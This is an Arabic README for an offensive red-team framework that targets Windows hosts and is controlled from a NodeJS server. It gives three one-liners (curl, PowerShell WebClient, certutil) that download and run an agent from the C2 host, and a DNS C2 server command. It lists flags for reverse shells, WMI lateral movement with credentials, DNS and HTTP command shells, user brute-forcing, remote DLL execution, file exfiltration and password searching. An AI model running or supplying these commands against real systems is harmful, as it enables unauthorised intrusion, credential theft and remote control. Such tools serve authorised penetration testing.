
إطار عمل فريد لمحاكاة الأمن السيبراني وعمليات اختبار الاختراق (red teaming)، وتدقيق ويندوز بحثًا عن الثغرات الجديدة والأخطاء التكوينية وهجمات تصعيد الامتيازات، وتكرار تكتيكات وتقنيات الخصم المتقدم في الشبكة.
ادعم المشروع للتطوير المستمر (ETH 0xf340c15c5e669a4ababab856e9f2bccd659d6e42)
الإصدار الحالي 2.2.0
تم توفير إصدار 0xsp mongoose red لمساعدة احتياجاتك أثناء محاكاة الأمن السيبراني. باستخدام هذا الإصدار، ستتمكن من تدقيق نظام تشغيل ويندوز مستهدف بحثًا عن ثغرات النظام، وسوء التهيئة، وهجمات رفع الامتيازات، وإعادة إنتاج تكتيكات وتقنيات الخصم المتقدم في الشبكة.
مع دعم NodeJS لواجهة برمجة تطبيقات الويب، يصبح التثبيت والتخصيص أسهل بكثير في الوقت المناسب. سيتواصل مستشعر ويندوز مع واجهة API الخاصة بالتطبيق لنقل النتائج واستقبال الأوامر كتقنية ثنائية الاتجاه.
المستشعر قادر على تحديد واكتشاف ثغرات ويندوز باستخدام وحدات windows update api و exploit database definitions. سيتمكن الإصدار الجديد أيضًا من اكتشاف الثغرات التالية.
git clone --single-branch --branch 0xsp-red https://github.com/lawrenceamer/0xsp-mongoose
cd 0xsp-mongoose/
npm install
node index.js
بيانات الاعتماد الافتراضية للوصول:
touch temp.txt
python3 dns_server.py -d DOMAIN -a PUBLICIP -i INTERFACEIP
#مثال 1
curl.exe -o agent.exe http://nodejsip:4000/release/x64.exe
#مثال 2
powershell.exe -command (new-object net.webclient).downloadfile('http://nodejsip:4000/release/x64.exe','c:\tmp\agent.exe');
#مثال 3
certutil.exe -urlcache -split -f "http://nodejsip:4000/release/x64.exe" agent.exe
-s --استرجاع خدمات ويندوز والبرامج التشغيل المثبتة.
-u --استرجاع معلومات عن المستخدمين والمجموعات والأدوار.
-c --البحث عن برامج تشغيل متصلة لملفات تهيئة حساسة حسب الامتداد.
-n --استرجاع معلومات الشبكة وواجهات الشبكة وتفاصيل الاتصال.
-w --تعداد الأدلة القابلة للكتابة والتحقق من أذونات الوصول والأذونات المعدلة.
-i --تعداد معلومات نظام ويندوز والجلسات والتحقق من الرفع الدائم.
-l --البحث في أي ملف عن سلسلة نصية محددة، مثال: agent.exe -l c:\ password *.config.
-o --تحديد عنوان مضيف تطبيق NodeJS، يمكنك أيضًا استخدام srvhost
-p --تعداد البرامج المثبتة والعمليات الجارية والمهام.
-e --أداة فحص النواة، ستساعد في البحث من خلال قواعد بيانات الأدوات عن ثغرات نواة ويندوز.
-x --كلمة المرور لتخويل اتصالك بتطبيق NodeJS.
-d --تنزيل الملفات مباشرة إلى الجهاز المستهدف.
-t --رفع الملفات من الجهاز المستهدف إلى تطبيق NodeJS.
-spooler --مسح مضيف واحد أو قائمة من المضيفين بحثًا عن CVE-2021-1675 المحتملة (مثال: -spooler -srvhost أو -spooler -hosts )
-m --تشغيل جميع أنواع الفحص المعروفة معًا.
[!] قسم تكتيكات الفريق الأحمر
-r --إنشاء شل عكسي بحساب محدد.
-lr --تقنية الحركة الجانبية باستخدام WMI (مثال: -lr -host 192.168.14.1 -username administrator -password blabla -srvhost nodejsip )
-nds --اكتشاف الشبكة وتعداد المشاركات
-dns --إنشاء شل تفاعلي DNS C2C
-cmd --نقل الأوامر عبر HTTP Shell
-interactive --بدء الوضع التفاعلي (مثال: تحميل الإضافات ..إلخ)
-username --مصادقة الهوية لوحدات الهجوم المحددة.
-password --مصادقة الهوية لوحدات الهجوم المحددة.
-host --تحديد المضيف البعيد لتنفيذ هجوم عليه.
-srvhost --تعيين المضيف البعيد لتطبيق NodeJS.
-bf --وحدة اختراق المستخدمين المحليين / مستخدمي المجال
-import --استيراد وتنفيذ ملف DLL محليًا
-remote --استيراد وتنفيذ ملف DLL من مضيف بعيد
https://0xsp.com/security%20dev/0xsp-mongoose-red
تأكد من الاشتراك في القناة التالية ليصلك إشعار عند نشر دروس وحيل جديدة لـ 0xsp https://www.youtube.com/channel/UCoEr6Qsyd6oMsPmaJPQ_FOg